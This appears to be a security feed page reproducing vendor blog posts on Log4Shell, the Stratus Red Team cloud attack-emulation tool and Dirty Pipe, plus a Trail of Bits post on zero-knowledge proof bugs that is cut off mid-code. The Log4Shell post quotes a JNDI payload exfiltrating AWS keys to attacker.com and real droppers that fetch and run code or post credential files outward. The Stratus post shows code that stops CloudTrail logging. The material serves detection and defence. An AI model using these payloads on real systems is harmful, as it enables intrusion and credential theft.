# feeds

by zer0x0ne

## some of my favourite websites: The Hacker News, Trail of Bits, Dark Reading, Threatpost, Tripwire, Security Weekly, xkcd

### xkcd

Retrieved title: xkcd.com, 3 item(s)

##### Paper Title

### Datadog Security Labs

Retrieved title: Datadog Security Labs, 3 item(s)
##### The Log4j Log4Shell vulnerability: Overview, detection, and remediation

On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system.

In this blog post, we will cover key points and observations about Log4Shell, explain how to check whether your applications are vulnerable, and walk through how to remediate affected services.

We will also look at how to leverage Datadog to protect your infrastructure and applications. Finally, we will provide some intelligence about exploitation attempts in the wild, showcasing how attackers are using this vulnerability.

Note: An official statement detailing how Datadog responded internally to this vulnerability is available here.

## Key points and observations

The information in this section covers what we know as of December 14, 2021.

Log4Shell (CVE-2021-44228) is a vulnerability in Log4j, a widely used open source logging library for Java. The vulnerability was introduced to the Log4j codebase in 2013 as part of the implementation of LOG4J2-313. According to Cisco Talos and Cloudflare, exploitation of the vulnerability as a zero-day in the wild was first recorded on December 1, 2021, nine days before public disclosure.

Below is a timeline of the discovery of Log4Shell and its effects:

• November 26: MITRE assigns the CVE identifier CVE-2021-44228
• November 29: An issue, LOG4J2-3198, is created to fix the vulnerability
• November 30: The commit fixing the vulnerability is pushed to the Log4j codebase
• December 10: LunaSec publishes an analysis and detailed advisory of the vulnerability
• December 10: Mass scanning and exploitation attempts of the vulnerability are recorded (see: Greynoise analysis)

Next, we'll look at how to check if your services are vulnerable to Log4Shell and cover methods to secure them.

## Check if your application is vulnerable

Log4j versions 2.0-beta9 through 2.14.1 (inclusive) are vulnerable. Using specific JDK versions (6u211+, 7u201+, 8u191+, and 11.0.1+) makes exploitation more challenging, but applications remain vulnerable. It's vital to first identify whether you are running an affected version of Log4j.
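As a quick illustration of that version range, here is a minimal sketch in Go (hypothetical helper, not part of any scanner mentioned here) that classifies a Log4j 2.x version string. Note that real scanners must also treat the later 2.12.2 and 2.3.1 backport releases as fixed:

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// vulnerable reports whether a Log4j 2.x version string falls in the
// affected range 2.0-beta9 through 2.14.1 (inclusive). This is a rough
// sketch: real scanners must also treat the later 2.12.2 and 2.3.1
// backport releases as fixed.
func vulnerable(version string) bool {
	base := strings.SplitN(version, "-", 2)[0] // "2.0-beta9" -> "2.0"
	parts := strings.Split(base, ".")
	if len(parts) < 2 || parts[0] != "2" {
		return false
	}
	minor, err := strconv.Atoi(parts[1])
	if err != nil {
		return false
	}
	patch := 0
	if len(parts) > 2 {
		patch, _ = strconv.Atoi(parts[2])
	}
	// vulnerable: 2.0 (including betas) up to and including 2.14.1
	return minor < 15 && (minor < 14 || patch <= 1)
}

func main() {
	fmt.Println(vulnerable("2.14.1")) // true
	fmt.Println(vulnerable("2.16.0")) // false
}
```

String matching like this is only a first filter; the scanners discussed below inspect actual packaged artifacts, including transitive dependencies.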

LunaSec released an open-source scanner that you can run against a Java project directory to determine if an application is vulnerable. You can also use open-source software composition analysis (SCA) tooling, such as OWASP DependencyCheck, to identify vulnerable Log4j versions running in your environment.

You can also leverage native Java build tools (e.g., gradle dependencies) to query your application's dependencies, even transitive ones (i.e., dependencies your application doesn't package directly but that are pulled in through another dependency). The output below shows a transitive dependency on a vulnerable Log4j version (2.14.1).

    ./gradlew dependencies

    runtimeClasspath - Runtime classpath of source set 'main'.
    [...]
    \--- org.springframework.boot:spring-boot-starter-log4j2:2.6.1
         +--- org.apache.logging.log4j:log4j-slf4j-impl:2.14.1
         |    +--- org.slf4j:slf4j-api:1.7.25 -> 1.7.32
         |    +--- org.apache.logging.log4j:log4j-api:2.14.1
         |    \--- org.apache.logging.log4j:log4j-core:2.14.1
         |         \--- org.apache.logging.log4j:log4j-api:2.14.1

If you do identify applications that are using vulnerable versions of Log4j, there are actions you can take to remediate the problem.

## Remediate affected services

LunaSec's remediation guide is a good resource that details key mitigation strategies. Simply put, the most effective remediation is to upgrade Log4j to version 2.16+. However, if it is not possible to upgrade your Log4j version, you can follow the instructions outlined by LunaSec or the Apache Foundation to remediate the vulnerability.

As a last resort, the community also made available a virtual patching method to prevent exploitation at runtime.

Now that we've gone over how to identify and remediate vulnerable applications, we'll cover the exploit attack chain in more detail and look at other ways you can secure your systems against it.

## How the Log4Shell vulnerability works

The Log4Shell vulnerability targets the parts of Log4j that parse and log user-controlled data. Teams monitoring their infrastructure and business operations routinely log client data, including HTTP requests or IP addresses. Log4Shell allows attackers to abuse this operation to compromise vulnerable applications.

Log4Shell specifically takes advantage of Log4j's ability to perform lookups through JNDI, the Java Naming and Directory Interface. This feature was added to Log4j in 2013. By using a specially crafted string containing a JNDI lookup, an attacker can force the vulnerable application to connect to an attacker-controlled LDAP server, which responds with a malicious payload.

Below is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).

• Step one: An attacker triggers the exploit, passing a malicious payload via a user-supplied input. This could be an HTTP header or anything being logged by the application using Log4j.
• Step two: The application logs the user-supplied input.
• Step three: The Log4j library interprets the malicious payload and connects to a malicious LDAP server.
• Step four: The malicious LDAP server sends back a response instructing the application to load a remote class file.
• Step five: The application downloads and executes the remote Java class file.

GovCERT recommends a number of defensive measures to help prevent successful exploitation (including the ones we covered above). At Datadog, we have implemented these measures to ensure our systems are fully secure.

While the exploitation steps above reflect what is needed for full application compromise, it is important to be aware that it's possible to leak sensitive data such as environment variables through steps one through three alone. For instance, let's say an attacker supplies the following input that Log4j logs:

    curl http://vulnerable-app:8080 \
      -H 'X-Api-Version: ${jndi:ldap://${env:AWS_ACCESS_KEY_ID}.${env:AWS_SECRET_ACCESS_KEY}.attacker.com}'

This will cause the vulnerable application to perform a DNS request to an attacker-controlled server, leaking the application's AWS credentials without the need for a second-stage payload.

Next, we'll look at how Datadog can help you detect these exploit steps within your environment.

## How Datadog can help

The Datadog Security Platform allows you to detect attacker behavior at different stages of the Log4Shell attack lifecycle.

Datadog Application Security (currently in private beta) identifies Log4Shell attack payloads sent to applications. Thanks to its tight integration with Datadog APM, it also provides visibility into vulnerable applications that attempt to remotely load malicious code. You can search in Datadog for occurrences of fetched Java classes using the query @http.url:*.class, and dive into the resulting traces to see details about each request.

If you discover your system has been targeted, you should then try to identify possible LDAP connections to the internet. You can use Datadog Network Performance Monitoring to look for suspicious egress connections. The screenshot below shows a vulnerable application connecting to an attacker-controlled LDAP server on port 389, an indicator that the application has likely been compromised.

In addition to knowing when an attacker might be attempting to use the Log4Shell exploit on your applications, it's also key to detect if they have been successful and have gained access to your system. Datadog Cloud Workload Security monitors process, file, and kernel activity across your Linux hosts and containers, and automatically identifies the common post-exploitation activity that we have seen attackers using after successfully exploiting Log4Shell. Out-of-the-box rules scan for:

• Java processes spawning a shell or system utility. This is often an indicator of an application vulnerability having been exploited to execute system commands.
• Persistence through systemd. Malware frequently attempts to create system services to persist (i.e., survive system reboots). Although pointless in a container environment, this behavior is indicative of attacker activity.
• Persistence through crontabs. Especially in container environments, usage of crontabs is highly suspicious.
• Execution of a network utility, such as curl or wget. Although this might also be legitimate behavior for debugging purposes, it is generally suspicious to have network utilities running in a container. Ideally, production container images should be stripped of such utilities, so the use of a network utility inside a container can be a valuable indicator of attacker activity.
• Usage of package management commands inside containers. Containers are meant to be immutable: when they need a new software package, they are torn down and rebuilt from scratch. Consequently, usage of apt, yum, or apk commands is highly suspicious and indicative of an attacker attempting to install utility software.

Datadog's out-of-the-box threat detection rules automatically look for the above activity. If any potentially malicious behavior is found, Datadog emits a security signal that you can analyze to determine if your environment is vulnerable.

Finally, we'll look at real-world attempts to exploit the Log4Shell vulnerability that Datadog has observed in our telemetry. This is critical to understanding how exploits for Log4Shell have evolved, and it allows defenders to monitor for these evolutions.

## Log4Shell in the wild

Datadog has observed various Log4Shell exploitation attempts in the wild. While some include probes from security researchers and companies, a substantial portion of them are from threat actors attempting to compromise applications.
Other threat intelligence companies have also recorded attacks stemming from financially motivated actors and nation-state actors. In particular, we have observed:

• Droppers for commodity malware such as Kinsing and Mirai. Most of these follow a common pattern:

    curl <ip> -o <short-name> && chmod +x <short-name> && ./<short-name>

• A PowerShell dropper using a BITS job to download and execute a malicious executable file:

    powershell -c iex ((New-Object System.Net.WebClient).DownloadString('https://textbin[.]net/raw/0l8h4xuvxe'))

• Attempts to exfiltrate the following sensitive environment variables over DNS: AWS_SECRET_ACCESS_KEY, DB_HOST, DB_USERNAME, DB_PASSWORD.
• Attempts to steal AWS credentials from the file ~/.aws/credentials using the command:

    curl -d "$(cat ~/.aws/credentials)" https://<redacted>.interactsh.com

• Payload obfuscation to attempt to bypass WAF rules, such as:

    ${jn${lower:d}i:l${lower:d}ap://<redacted>}

• Injections being performed using various HTTP headers, the most common ones being User-Agent, Referer, X-Forwarded-For, and Authorization.

The Kinsing payload Datadog analyzed behaves as follows after having compromised the system:

• Checks if curl or wget are installed on the system and, if not, installs them with apt.
• Using curl or wget, downloads a malicious binary to a temporary folder. The target directory is whichever is the first writable of /tmp, /var/tmp, the directory returned by mktemp -d, or /dev/shm.
• Attempts to clean the system of any competitor malware by removing crontab entries and killing running processes.
• Persists on the system by writing a crontab entry that executes a malicious script every minute, and by creating a systemd service.
• Runs cryptocurrency mining on the system.

Most of these actions are suspicious, especially in a modern cloud-native environment where containers are supposed to be immutable.

## Conclusion

The Log4Shell vulnerability is a high-impact vulnerability that is easy for attackers to exploit and has far-reaching consequences on the industry as a whole. In this post, we discussed some detection and prevention strategies for this particular vulnerability, and showcased behavioral detection capabilities of the Datadog Security Platform against real-world attacks. This vulnerability illustrates the need for a defense-in-depth strategy and an "assume breach" mindset, where security mechanisms are layered together to ensure that the failure of a single layer does not lead to a full compromise.

## Acknowledgments

Thank you to Jean-Baptiste Aviat, Nick Davis, Emile Spir, and Eslam Salem, all of whom contributed to the making of this post.

##### Elevate AWS threat detection with Stratus Red Team

A core challenge for threat detection engineering is reproducing common attacker behavior.
Several open source and commercial projects exist for traditional endpoint and on-premise security, but there is a clear need for a cloud-native tool built with cloud providers and infrastructure in mind. To meet this growing demand, we're happy to announce Stratus Red Team, an open source project created to emulate common attack techniques directly in your cloud environment. Stratus Red Team allows you to easily execute offensive techniques against live environments and validate your threat detection logic end-to-end.

Stratus Red Team is available for free on GitHub, and you can find its documentation at stratus-red-team.cloud. It's a lightweight, easy-to-install Go binary that comes packaged with a number of AWS-specific attack techniques, such as:

• Credential access: Steal EC2 instance credentials
• Discovery: Execute discovery commands on an EC2 instance
• Defense evasion: Stop a CloudTrail trail
• Exfiltration: Exfiltrate data from an S3 bucket by backdooring its bucket policy

Stratus Red Team is opinionated about the attack techniques it packages. This ensures that each simulated attack is granular, self-sufficient, and provides fully actionable value. You can find the full list of packaged attack techniques here.

Each attack technique is mapped to the MITRE ATT&CK framework and has a documentation page, such as the example below, which is automatically generated from its definition in Go code.

The project also manages the full lifecycle of each attack technique, including creating and removing any infrastructure or configuration needed to execute it. This is what we call warming up an attack technique; once an attack technique is warm, it can be detonated (i.e., executed to emulate the intended attacker behavior). Once detonated, it can be cleaned up so that any infrastructure created during the warm-up phase is removed.

We've created a detailed page about how Stratus Red Team compares to other popular cloud security projects, such as Atomic Red Team, Leonidas, Pacu, Amazon GuardDuty, and CloudGoat.

## Getting started with Stratus Red Team

See the Getting Started guide for an introduction to Stratus Red Team and its core concepts. As a sample walkthrough, we'll first authenticate to our AWS account using aws-vault. Stratus Red Team expects you to be authenticated against AWS before using it, and you can use any authentication method supported by the AWS SDK for Go V2 (e.g., $HOME/.aws/config, AWS SSO, hardcoded keys in your environment, etc.):


aws-vault exec sandbox --no-session



Let's have a look at the available AWS techniques for persistence:

We can view additional details about any attack technique by running stratus show <TECHNIQUE ID> or by viewing the documentation. For example, aws.persistence.lambda-backdoor-function establishes persistence by backdooring a Lambda function to allow its invocation from an external AWS account. The warm-up phase creates a Lambda function, and the detonation phase modifies the Lambda function's resource-based policy to allow lambda:InvokeFunction from an external, fictitious AWS account.

Detonating this attack technique with Stratus Red Team is as simple as running:

    stratus detonate aws.persistence.lambda-backdoor-function

The detonate command will:

1. Warm up the attack technique by creating its prerequisites. For this specific technique, it will create a Lambda function.
2. Detonate the attack technique by calling lambda:AddPermission to backdoor the Lambda execution policy and allow it to be executed by an external AWS account.

You should see the following output from these two steps:

    Checking your authentication against the AWS API
    Warming up aws.persistence.lambda-backdoor-function
    Initializing Terraform to spin up technique prerequisites
    Applying Terraform to spin up technique prerequisites
    Lambda function arn:aws:lambda:us-east-1:751353041310:function:stratus-sample-lambda-function is ready
    Backdooring the resource-based policy of the Lambda function stratus-sample-lambda-function
    {"Sid":"backdoor","Effect":"Allow","Principal":"*","Action":"lambda:InvokeFunction","Resource":"arn:aws:lambda:us-east-1:751353041310:function:stratus-sample-lambda-function"}

Once detonated, we can check our Lambda function's execution policy in the AWS Console and confirm it has been backdoored. To remove any infrastructure created for this attack technique, we simply run:

    stratus cleanup aws.persistence.lambda-backdoor-function

At any point in time, we can see the status of our attack techniques by running stratus status.
## Defining attack techniques as code

All attack techniques packaged in Stratus Red Team are defined as Go code and can automatically generate user-friendly documentation. Here is what the attack technique Stop CloudTrail Trail, which emulates an attacker disrupting CloudTrail logging for defense evasion purposes, looks like:

    stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
        ID:                 "aws.defense-evasion.stop-cloudtrail",
        FriendlyName:       "Stop CloudTrail Trail",
        Platform:           stratus.AWS,
        MitreAttackTactics: []mitreattack.Tactic{mitreattack.DefenseEvasion},
        Description: `
    Stops a CloudTrail Trail from logging. Simulates an attacker disrupting CloudTrail logging.

    Warm-up:
    - Create a CloudTrail Trail.

    Detonation:
    - Call cloudtrail:StopLogging to stop CloudTrail logging.
    `,
        PrerequisitesTerraformCode: tf,
        IsIdempotent:               true, // cloudtrail:StopLogging is idempotent
        Detonate:                   detonate,
        Revert:                     revert,
    })

You'll notice the attack technique has prerequisite infrastructure: in this case, it requires a CloudTrail trail in order to stop it. Stratus Red Team packages the Terraform code needed to create and remove all prerequisites.

The detonation function is the core part of the attack technique, simulating the actual malicious behavior.
It is written using the AWS SDK for Go V2 in an imperative manner:

    func detonate(params map[string]string) error {
        cloudtrailClient := cloudtrail.NewFromConfig(providers.AWS().GetConnection())

        // Retrieve the prerequisite CloudTrail Trail name
        trailName := params["cloudtrail_trail_name"]

        log.Println("Stopping CloudTrail trail " + trailName)
        _, err := cloudtrailClient.StopLogging(context.Background(), &cloudtrail.StopLoggingInput{
            Name: aws.String(trailName),
        })
        if err != nil {
            return errors.New("unable to stop CloudTrail logging: " + err.Error())
        }
        return nil
    }

## Using Stratus Red Team as a Go library

Although the main entry point of Stratus Red Team is its command-line interface, it can also be used programmatically as a Go library. This is valuable for automating the detonation of attack techniques, e.g., in a nightly build as part of a continuous integration system. Read our instructions and examples of programmatic usage for more information.

## What's next?

While Stratus Red Team is currently focused on AWS, we plan to add support for Kubernetes and Azure in the future. We will also continue adding new attack techniques and refining the project based on community feedback.

## Acknowledgments

The maintainer of Stratus Red Team is Christophe Tafani-Dereeper. We would like to thank the following people for actively improving the project with their early feedback:

• Zack Allen, Sam Christian, Andrew Krug, and Adam Stevko from Datadog
• Alberto Certo from Nexthink
• Nick Frichette from State Farm
• Rami McCarthy from Cedar

##### The Dirty Pipe vulnerability: Overview, detection, and remediation

On March 7, 2022, Max Kellermann publicly disclosed a vulnerability in the Linux kernel, later named Dirty Pipe, which allows underprivileged processes to write to arbitrary readable files, leading to privilege escalation. This vulnerability affects kernel versions starting from 5.8.
After its discovery, it was fixed for all currently maintained releases of Linux in versions 5.16.11, 5.15.25, and 5.10.102. While easier to exploit, it is similar to an older vulnerability disclosed in 2016, Dirty COW, which has been actively exploited by malicious actors since then.

## Key points and observations

• May 20, 2020: The vulnerability is unknowingly introduced into the Linux kernel through a code refactoring in commit f6dd975583bd.
• August 2, 2020: Linux kernel version 5.8 is released. It is the first version to include the vulnerability.
• February 20, 2022: Max Kellermann responsibly discloses the vulnerability to the Linux kernel security team.
• February 21, 2022: The patch is released to the Linux Kernel Mailing List, without information about the vulnerability yet.
• February 23, 2022: Linux kernel versions 5.16.11, 5.15.25, and 5.10.102 are released with the patch.
• March 7, 2022: Public disclosure by Max Kellermann.

The Dirty Pipe vulnerability is trivial to exploit and affects a wide range of systems, including some versions of the Android OS, which is based on the Linux kernel. Applying kernel patches is typically more challenging than standard software updates, and this can be especially true for Android-based systems. As a consequence, we believe that a high number of systems will remain vulnerable in the future.

Datadog was also able to demonstrate that Dirty Pipe can be used to break out of unprivileged containers. Once there has been sufficient time for the community to remediate this vulnerability, we will release full technical details of our container breakout.

## Check if your system is vulnerable

This vulnerability exclusively affects Linux-based systems.
The easiest way to check whether your system is vulnerable is to see which version of the Linux kernel it uses by running the command uname -r. A system is likely to be vulnerable if it has a kernel version of 5.8 or higher, but lower than 5.16.11, 5.15.25, or 5.10.102. For instance:

• Kernel version 5.7.11 is not vulnerable, as it's older than 5.8.
• Kernel version 5.10.96 is vulnerable, as it's more recent than 5.8 and older than 5.10.102.
• Kernel version 5.16.10 is vulnerable, as it's more recent than 5.8 and older than 5.16.11.
• Kernel version 5.16.11 includes the patch and so is not vulnerable.

For more precise instructions on how to check if a system is vulnerable, you can refer to the advisory specific to your Linux distribution, which we will cover in the next section.

## Remediate affected systems

To remediate the vulnerability, ensure your Linux systems are running a kernel version of 5.16.11, 5.15.25, 5.10.102, or more recent. Major Linux distributions have released dedicated security bulletins to help mitigate the vulnerability.

While the situation is still developing, as of this writing Azure and GCP have not yet released a bulletin. AWS issued ALAS-2022-1571 and ALAS2KERNEL-5.4-2022-023 for its Amazon Linux operating system.

## How the Dirty Pipe vulnerability works

This vulnerability lies in the inner workings of the Linux kernel page cache, which tracks which bits of memory ("pages") need to be persisted to disk and which can remain in memory only. When exploited, the Dirty Pipe vulnerability allows an underprivileged user to write arbitrary data to any file that user can read on the file system.

There are several ways to exploit this vulnerability for privilege escalation. One of them is by writing to the /etc/passwd file, which contains the list of users along with their privileges.
For instance, appending a crafted line to /etc/passwd creates a new user, "malicious-attacker," with password "datadog" and the same privileges as root.

### Escaping from underprivileged containers using Dirty Pipe

The Dirty Pipe vulnerability can also be used to escape from underprivileged Linux containers. We were able to overwrite the RunC binary from a container running a proof-of-concept exploit. RunC is part of many container runtimes used by Docker and Kubernetes, among other container technologies. Its role is to spawn, run, and configure containers on Linux. A specially crafted attack on RunC allows a malicious actor to compromise the host's operating system, leading to a full host compromise.

We will release full details of the PoC in an upcoming blog post, in order to give the community time to update their infrastructure with the latest Linux kernel patches that protect against this attack.

## How Datadog can help

The Datadog Cloud Workload Security team is working to add capabilities to the Datadog Agent in order to reliably detect exploitation of Dirty Pipe. Specifically, we have added splice to the list of system calls that the Agent monitors in real time using eBPF. This feature is expected to be released as part of version 7.35 of the Datadog Agent. Customers of Cloud Workload Security will receive a notification to update their Agent to a version that can detect exploitation of the Dirty Pipe vulnerability.

By enabling Datadog to watch for splice system calls, we are able to create a detection rule that identifies when the splice system call is performed on a file that isn't world-writable with the PIPE_BUF_FLAG_CAN_MERGE flag set, which is required to trigger the vulnerability.
We have also crafted more specific rules to identify several common exploitation cases:

• When an executable file is overwritten:

    (splice.pipe_exit_flag & PIPE_BUF_FLAG_CAN_MERGE) > 0 && (splice.file.mode & S_IXGRP > 0 || splice.file.mode & S_IXOTH > 0 || splice.file.mode & S_IXUSR > 0)

• When a file in a critical system path is overwritten:

    (splice.pipe_exit_flag & PIPE_BUF_FLAG_CAN_MERGE) > 0 && (splice.file.path in [ ~"/bin/*", ~"/sbin/*", ~"/usr/bin/*", ~"/usr/sbin/*", ~"/usr/local/bin/*", ~"/usr/local/sbin/*", ~"/boot/**" ])

## Conclusion

Dirty Pipe is a significant vulnerability because it provides attackers with an easy-to-use local privilege escalation on Linux and cloud infrastructure. We will continue to update this post as more information about the vulnerability becomes available. However, the risks and disruptions Dirty Pipe makes possible can be mitigated through a defense-in-depth security approach. Datadog customers can enable Cloud Workload Security today to get immediate defense at the runtime level by detecting the exploitation in real time.

Securing your production environment is a continuous journey, and it doesn't stop after you've mitigated this newest vulnerability. For a more holistic, unified security approach, you can check out Datadog's Cloud Security Platform and start a 14-day free trial today.

### Trail of Bits

Retrieved title: Trail of Bits Blog, 3 item(s)

##### Specialized Zero-Knowledge Proof failures

By Opal Wright

Zero-knowledge (ZK) proofs are useful cryptographic tools that have seen an explosion of interest in recent years, largely due to their applications to cryptocurrency.
The fundamental idea of a ZK proof is that a person with a secret piece of information (a cryptographic key, for instance) can prove something about the secret without revealing the secret itself. Cryptocurrencies are using ZK proofs for all sorts of fun things right now, including anonymity, transaction privacy, and "roll-up" systems that help increase the efficiency of blockchains by using ZK proofs to batch transactions together. ZK proofs are also being used in more general ways, such as allowing security researchers to prove that they know how to exploit a software bug without revealing information about the bug.

As with most things in cryptography, though, it's hard to get everything right. This blog post is all about a pair of bugs in some special-purpose ZKP code that allow ne'er-do-wells to trick some popular software into accepting invalid proofs of impossible statements. That includes "proving" the validity of invalid inputs to a group signature, which in turn can lead to invalid signatures. In blockchain systems that use threshold signatures, like ThorChain and Binance, this could allow an attacker to prevent targeted transactions from completing, creating a denial-of-service attack against the chain as a whole or against specific participants.

## Background on discrete log proofs

One specialized ZK proof is a discrete logarithm proof of knowledge. Suppose Bob provides Alice with an RSA modulus N = PQ, where P and Q are very large primes known only to Bob, and Bob wants to prove to Alice that he knows a secret exponent x such that s ≡ t^x (mod N). That is, x is the discrete logarithm of s with respect to base t, and he wants to prove that he knows x without revealing anything about it.

The protocol works as follows:

• First, Bob and Alice agree on a security parameter k, which is a positive integer that determines how many iterations of the protocol to perform. In practice, this is usually set to k = 128.
• Second, Bob randomly samples a_i from Z_Φ(N) for i = 1, 2, …, k, computes corresponding values α_i = t^(a_i) (mod N), and sends α_1, α_2, …, α_k to Alice.
• Third, Alice responds with a sequence of random bits c_1, c_2, …, c_k.
• Fourth, Bob computes z_i = a_i + c_i·x and sends z_1, z_2, …, z_k to Alice.
• Finally, Alice checks that t^(z_i) ≡ α_i·s^(c_i) (mod N) for all i = 1, 2, …, k. If all the checks pass, she accepts the proof and is confident that Bob really knows x. Otherwise, she rejects the proof: Bob may be cheating!

## Why it works

Suppose Bob doesn't know x. For each i, Bob has two ways to attempt to fool Alice: one if he thinks Alice will pick c_i = 0, and one if he thinks Alice will pick c_i = 1.

If Bob guesses that Alice will select c_i = 0, he can select a random a_i ∈ Z_N and send Alice α_i = t^(a_i) mod N. If Alice selects c_i = 0, Bob sends Alice z_i = a_i, and Alice sees that t^(z_i) ≡ t^(a_i) ≡ α_i·s^0 ≡ α_i (mod N) and accepts the i-th iteration of the proof. On the other hand, if Alice selects c_i = 1, Bob needs to compute z_i such that t^(z_i) ≡ α_i·s ≡ t^(a_i)·s (mod N). That is, he needs to find the discrete logarithm of t^(a_i)·s, which is equal to a_i + x. However, Bob doesn't know x, so he can't compute a z_i that will pass Alice's check.

On the other hand, if Bob guesses that Alice will select c_i = 1, he can select a random a_i ∈ Z_N and send Alice α_i = t^(a_i)·s^(−1) (mod N). If Alice selects c_i = 1, Bob sends Alice z_i = a_i, and Alice sees that t^(z_i) ≡ t^(a_i) ≡ (t^(a_i)·s^(−1))·s ≡ α_i·s (mod N) and accepts the i-th iteration of the proof. But if Alice selects c_i = 0, Bob needs to compute z_i such that t^(z_i) ≡ α_i ≡ t^(a_i)·s^(−1) (mod N), which would be z_i = a_i − x. But again, since Bob doesn't know x, he can't compute a z_i that will pass Alice's check.

The trick is, each of Bob's guesses only has a 50 percent chance of being right. If any one of Bob's k guesses for Alice's c_i values is wrong, Alice will reject the proof as invalid. If Alice is choosing her c_i values randomly, that means Bob's chances of fooling Alice are about 1 in 2^k.
Typically, Alice and Bob will use parameters like k = 128. Bob has a better chance of hitting the Powerball jackpot four times in a row than he does of guessing all of c_1, c_2, …, c_128 correctly.

In the case of a non-interactive proof, as we'll see in the code below, we don't rely on Alice to pick the values c_i. Instead, Bob and Alice each compute a hash of all the values relevant to the proof:

    c = Hash(N ∥ s ∥ t ∥ α_1 ∥ … ∥ α_k)

The bits of c are used as the c_i values. This is called the Fiat-Shamir transform. It's certainly possible to get the Fiat-Shamir transform wrong, with some pretty nasty consequences, but the bugs discussed in this article will not involve Fiat-Shamir failures.

## The code

Our proof structure and verification code come from tss-lib, written by the folks at Binance. We came across this code while reviewing other software, and the Binance folks were super responsive when we flagged this issue for them.

To start with, we have our Proof structure:

    type (
        Proof struct {
            Alpha, T [Iterations]*big.Int
        }
    )

This is a fairly straightforward structure. We have two arrays of large integers, Alpha and T. These correspond, respectively, to the α_i and z_i values in the mathematical description above. It's notable that the Proof structure does not incorporate the modulus N or the values s and t.

    func (p *Proof) Verify(h1, h2, N *big.Int) bool {
        if p == nil {
            return false
        }
        modN := common.ModInt(N)
        msg := append([]*big.Int{h1, h2, N}, p.Alpha[:]...)
        c := common.SHA512_256i(msg...)
        cIBI := new(big.Int)
        for i := 0; i < Iterations; i++ {
            if p.Alpha[i] == nil || p.T[i] == nil {
                return false
            }
            cI := c.Bit(i)
            cIBI = cIBI.SetInt64(int64(cI))
            h1ExpTi := modN.Exp(h1, p.T[i])
            h2ExpCi := modN.Exp(h2, cIBI)
            alphaIMulH2ExpCi := modN.Mul(p.Alpha[i], h2ExpCi)
            if h1ExpTi.Cmp(alphaIMulH2ExpCi) != 0 {
                return false
            }
        }
        return true
    }

This code actually implements the verification algorithm. The arguments h1 and h2 correspond to t and s, respectively.
First, it computes the challenge value c. Then, for each bit c_i of c, it computes h1ExpTi = t^(z_i) mod N and alphaIMulH2ExpCi = α_i·s^(c_i) mod N. If h1ExpTi ≠ alphaIMulH2ExpCi for any 0 < i ≤ k, the proof is rejected. Otherwise, it is accepted.

## The issue

The thing to notice is that the Verify function doesn’t do any sort of check to validate h1, h2, or any of the elements of p.Alpha or p.T. A lack of validity checks means we can trigger all sorts of fun edge cases. In particular, when it comes to logarithms and exponential relationships, it’s important to look out for zero. Recall that, for any x ≠ 0, we have 0^x = 0. Additionally, for any x, we have 0·x = 0. We are going to exploit these facts to force the equality check h1ExpTi = alphaIMulH2ExpCi to always pass.

## The first impossible thing: Base-0 Discrete Logs

Suppose Bob creates a Proof structure p with the following values:

• All elements of p.T are positive (that is, z_i > 0 for all i)
• All elements of p.Alpha are set to 0 (that is, α_i = 0 for all i)

Now consider a call to the Verify function with the following parameters:

• N is the product of two large primes
• h1 set to 0 (that is, t = 0)
• h2 set to any integer (that is, s is unconstrained)

The Verify function will check that t^(z_i) ≡ α_i·s^(c_i) (mod N). On the right-hand side of the relationship, α_i = 0 forces α_i·s^(c_i) = 0. On the left-hand side of the equation, t^(z_i) = 0^(z_i) = 0 because z_i > 0. Thus, the Verify function sees that 0 = 0, and accepts the proof as valid.

Recall that the proof is meant to demonstrate that Bob knows the discrete log of s with respect to t. In this case, the Verifier routine will believe that Bob knows an integer x such that s ≡ 0^x (mod N) for any s. But if s ∉ {0,1}, that’s impossible!

## The fix

Preventing this problem is straightforward: validate that h1 and the elements of p.Alpha are all non-zero.
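To make the edge case concrete, here is a toy Python reproduction of the same unvalidated check. The modulus and values are illustrative, not tss-lib’s:

```python
# Toy reproduction of the unvalidated check t^z_i == alpha_i * s^c_i (mod N).
N = 1019 * 1367        # small semiprime, for illustration only
k = 8
t = 0                  # the base nobody validated (h1 = 0)
s = 424242             # arbitrary: no discrete log of s base 0 exists
alpha = [0] * k        # all commitments zeroed out
z = [1] * k            # any positive responses work
c = [i % 2 for i in range(k)]  # challenge bits: their values don't matter here

# Both sides of every check collapse to 0, so the forged proof "verifies".
assert all(pow(t, zi, N) == (ai * pow(s, ci, N)) % N
           for ai, ci, zi in zip(alpha, c, z))
```

With any non-zero base the left-hand side would be a non-zero residue and the forgery would fail, which is why rejecting zero values closes the hole.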
As a matter of practice, it is a good idea to validate all cryptographic values provided by another party, ensuring, for example, that elliptic curve points lie on the curve and that integers fall within their appropriate intervals and satisfy any multiplicative properties. In the case of this proof, such validation would include checking that h1, h2, and the elements of p.Alpha are non-zero, relatively prime to N, and fall within the interval [1, N). It would also be a good idea to ensure that N passes some basic checks (such as a bit length check).

## Proof of encryption of a discrete log

In some threshold signature protocols, one of the steps in the signature process involves proving two things simultaneously about a secret integer x that Bob knows:

• That X = R^x, where X and R are in an order-q group G (typically, G will be the multiplicative group of integers for some modulus, or an elliptic curve group)
• That a ciphertext c = PaillierEnc_N(x, r) for some randomization value r ∈ Z*_N and Bob’s public key N. That is, c = (N + 1)^x·r^N (mod N²).

(Just for clarity: G is typically specified alongside a maximal-order group generator g ∈ G. It doesn’t get used directly in the protocol, but it does get integrated into a hash calculation – it doesn’t affect the proof, so don’t worry about it too much.)

Proving this consistency between the ciphertext c and the discrete logarithm of X ensures that Bob’s contribution to an elliptic curve signature is the same value he contributed at an earlier point in the protocol. This prevents Bob from contributing bogus X values that lead to invalid signatures.

As part of the key generation, a set of “proof parameters” is generated, including a semiprime modulus Ñ (whose factorization is unknown to Alice and Bob), as well as h1 and h2, both coprime to Ñ.

Bob begins by selecting uniform random values α ←$ Z_(q³), β ←$ Z*_N, γ ←$ Z_(q³Ñ), and ρ ←$ Z_(q³Ñ).
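The Paillier ciphertext form c = (N + 1)^x·r^N (mod N²) used above can be sketched in Python with toy primes. The parameters and helper names here are ours, for illustration only; real keys are thousands of bits:

```python
import math
import secrets

p, q = 1019, 1367               # toy primes; real Paillier keys are 2048+ bits
N = p * q
N2 = N * N
lam = math.lcm(p - 1, q - 1)    # Carmichael function λ(N)

def L(u):
    # The standard Paillier "L" function: L(u) = (u - 1) / N
    return (u - 1) // N

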